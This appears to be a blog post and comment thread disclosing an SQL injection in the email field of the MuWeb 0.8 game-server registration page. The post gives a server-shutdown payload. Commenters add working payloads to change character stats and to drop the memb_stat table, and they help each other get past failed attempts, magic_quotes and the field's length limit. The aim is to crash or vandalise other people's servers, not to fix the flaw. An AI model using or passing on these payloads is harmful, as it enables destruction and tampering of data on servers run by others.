MuWeb 0.8 Sql Injection

The other day I saw in search engine terms in my stats page (i usually look at it cause I’m trying to write posts according to what people look for when thrown over here) that someone came by searching for MuWeb 0.8 Sql Injection… for those I have a good news there is such a vulnerability… I as other people had to take some time to find out about it, because never took a look at the registration page… yep there it is situated in email input… why only there? Because there isn’t a email validation or string cleaning applied to it… (some patches clean the other strings but email not)… also the email input field had not a predefined length… yeah you can remove them, but they are trimmed in the php script…

‘;shutdown–

^^

15 comments so far

  1. jeremy on

    it is not long enough to add good commands Example to add items :P

  2. 4e4en on

    But thats enought to crash server :)

  3. dblackshell on

    not hard to modify stats and all that shit, just have to know the table name… I think it’s AccountCharacter (if remember well)… for adding items could check on the web… also knowing item codes would help you… also found on google.. ;)

  4. jeremy on

    it’s
    ”; update charater set strenght=value where name =’carname’ ;–
    you just need to remove limit..

  5. Tang on

    Hi,

    how to delete tables like memb_stat or memb_info?

    ”; delete memb_stat ;- ?

    thx

  6. dblackshell on

    “; drop table memb_stat–

  7. Cobranza on

    m….. whats is this?:
    Fatal error: Call to a member function on a non-object in c:\appserv\www\includes\character.class.php on line 25

    luego de poner “” ‘; drop table memb_stat– “”
    on click “register”

  8. dblackshell on

    possibly the server has magic_quotes turned on… or you didn’t use 2 (-) dashes…

  9. dblackshell on

    the quotes confused me… did you comment out the rest of the query (2 dashes)?

  10. Cobranza on

    the quotes confused you? the (“)??????
    sory, my english is sow sow or I do not speak much in english, but
    the quotes ir only for demo, de real code is
    ‘; drop table memb_stat–
    mm….. the (–) yes, is real, but, not enter the complete code, for input “email” jajajaja
    my english, jajajaja
    m………
    saving the font code, and, editing maxlength=”999999999″ of mail, is posible, but, other exist?¿?¿?¿?¿
    sorry for my english, is low, sow sow,

  11. Cobranza on

    m……. how to quit de magic_quotes?¿
    how to…… how to….. jaja how to avoiding the magic_quotes?¿?¿?¿?¿
    it is possible?

  12. Cobranza on

    whats is your mail??

  13. Cobranza on
  14. deivid on

    MU xelente…O Melhor

    Verssão 1.02n s2 ep
    Drops:80%
    Bug Bless ON
    Capacidade:500 Online

    Site>>> http://www.muexel.dahora.net
    Servidor Dedicado 24Hrs…OnLine!

  15. halloween on

    tirame ami si podes salame
    http://mu-helloween.servegame.com/

    ahi tenes pt no saves nada lo mio es

    indestructible


Leave a reply